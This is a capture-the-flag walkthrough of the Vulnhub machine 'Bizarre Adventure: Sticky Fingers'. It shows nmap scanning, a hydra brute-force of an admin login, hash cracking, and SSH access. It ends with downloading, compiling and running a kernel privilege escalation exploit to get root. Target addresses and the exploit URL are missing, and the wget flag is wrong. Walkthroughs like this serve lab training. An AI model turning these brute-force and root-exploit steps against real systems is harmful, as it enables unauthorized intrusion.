Vulnhub Walkthrough

Bizarre Adventure Sticky Fingers walkthrough

Today, we’re going share a vulnhub machine writeup is a machine named Bizarre Adventure: Sticky Fingers. It was an intermediate box based on the Linux machine. The goal of this machine is to read the root flag. you can download here the machine.

Network Scanning

We begin by scanning our network for the target machine using Netdiscover Tool.

sudo netdiscover

Now we have a target IP address ( ) and our next step is to run the Nmap scan and find which services are running and which ports are open target machine.

sudo nmap -sV

The Nmap scan gives us a lot of useful information, we see the resulting output target machine 3 ports are open 22/SSH, 53/Domain and 80/HTTP running Apache HTTP service.


let’s explore the target machine IP on the browser and see what we can find there.


After checking the page source code we couldn’t found anything useful, then we move the next navigate some common directory like /admin, photos/ images/ robot.txt, etc. and we discover a Flag.txt.txt file in the images directory.

After checking the page source code we get two usernames to let’s try password brute-forcing admin login page. you can use any other tool for brute-forcing, like burp-suite, and wfuzz.

hydra -l zipperman -P $pass_list http_post-form "/admin/index.php:uname=Zipperman&pass=^PASS^:Login Failed" -t 64

it takes a long time after a 47-minute target password is cracked and hydra discovers a valid password let’s try to login with /admin page.

After we log in with the admin page it redirects us to another page and here we can see some ASCII arts and a base64 encoded string, let’s copy the base64 string and decode it.

And decode output like a hash string let’s identified the name by using the hash-identifier tool.

We copy the SHA-256 hash and go to the website and navigate the /en/sha256 URL we successfully cracked the hash and we found a password.

Since we found user bucciarati /admin/37d1d7d74bef0e8fafe6f8dc37ee25b0 source code we try to login with the credentials.

sudo ssh bucciarati@

Now we log in with bucciarti by using the sha256 hash password and we run the uname -r command for checking the target machine kernel version.

After search about the kernel version, we found a Linux Local Privilege Escalation. let’s move the /tmp directory and download the exploit.

uname -r
cd /tmp
wget -o get-exp.c

Our exploit is downloaded and our next step is compiling the exploit .c file to an executable binary file format, let’s run the GCC compiler and compile the exploit add full permission.

gcc get-exp.c -o get-root
chmod 777 get-root

After executing the exploit we get the root shell target machine. let’s move the /root directory and read the root flag.

cd /root
cat flag.txt.txt

Cewlkid: 1 Vulnhub Walkthrough link

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View Archive